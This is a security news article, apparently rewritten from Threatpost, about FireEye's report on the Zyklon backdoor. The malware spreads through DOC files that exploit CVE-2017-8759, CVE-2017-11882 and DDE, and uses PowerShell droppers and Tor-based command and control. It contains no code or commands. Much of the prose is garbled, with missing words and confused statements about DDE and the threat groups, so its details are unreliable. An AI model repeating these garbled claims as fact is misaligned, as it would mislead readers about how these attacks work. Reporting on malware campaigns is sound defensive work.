Zyklon malware is using three Microsoft Office vulnerability for spreading. An attacker telecommunications, insurance, and financial services companies. According to FireEye researchers said the attackers are trying to collect passwords and encryption currency wallet data and for the possible future DDoS attacks collection target list.
The researchers said the attack started with spamming activity by sending a malicious ZIP file containing one of several types of DOC files that eventually took advantage of one of three Microsoft Office vulnerabilities.
The first vulnerability is Microsoft patched last October .NET Framework error (the CVE-2017-8759 ). Microsoft said the goal of opening infected documents allowed attackers to install programs, process data and create new privileged accounts. In the case of an attack described by FireEye, the infected DOC file contains an embedded OLE object that, when executed, triggers the download of additional DOC files from the stored URL. In mid-September 2017, the .NET Framework 0Day Vulnerability CVE-2017-8759, which has been used by attackers to distribute FinFisher malware
The second vulnerability ( CVE-2017-11882 ) was a 17-year remote code execution error found in an Office executable named Microsoft Formula Editor. This bug has been patched as part of Microsoft’s November 2017 Patch Tuesday release. Like previous vulnerabilities, victims who opened a specially crafted DOC automatically downloaded additional DOC files that contained PowerShell commands for downloading the final payload. At the end of November 2017, the Office Memory Corruption Vulnerability, cve-2017-11882, has been exploited in the wild, with Cobalt in action.
Microsoft does not consider the third vulnerability to be a hole in Dynamic Data Exchange (DDE). Instead, it insists DDE is a product feature. However, in November, it released instructions to administrators about how to safely disable this feature through the new Office registry settings. In mid-October 2017, DDE attacks do not require macros to be enabled and malware can be executed in Office applications, and FIN7 financial hackers are already in action
DDE is a protocol that establishes how applications send messages and share data through shared memory.However, over the past year, attackers have had great success using macro-based malware to leverage DDE to launch Dropper, vulnerabilities, and malware.
In a recent attack, FireEye said DDE was also used to download a Dropper.
The researchers wrote:
“In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded
The Pause.ps1 script is responsible for resolving the APIs required for code injection. Ultimately, Pause.ps1 acts as another dropper to deliver the final “core payload.”
FireEye wrote:
“Zyklon is a publicly available, full-featured backdoor capable of keylogging, password harvesting, downloading and executing additional plugins, conducting distributed denial-of-service (DDoS) attacks, and self-updating and self-removal. The malware can download several plugins, some of which include features such as cryptocurrency mining and password recovery, from browsers and email software.”
In this case, Zyklon can also communicate with its command and control C&C server over the Tor network. The researchers said.
“The Zyklon executable contains another encrypted file in its .Net resource section named tor. This file is decrypted and injected into an instance of InstallUtiil.exe, and functions as a Tor anonymizer”
The researchers said such malware can be used to perform many different tasks, including downloading new plug-ins, stealing passwords, or opening a proxy and establishing an inverted Socks5 proxy on the infected host. FireEye said.
“These types of threats show why it is very important to ensure that all software is fully updated. Additionally, all industries should be on alert, as it is highly likely that the threat actors will eventually move outside the scope of their current targeting.”
Source: threatpost
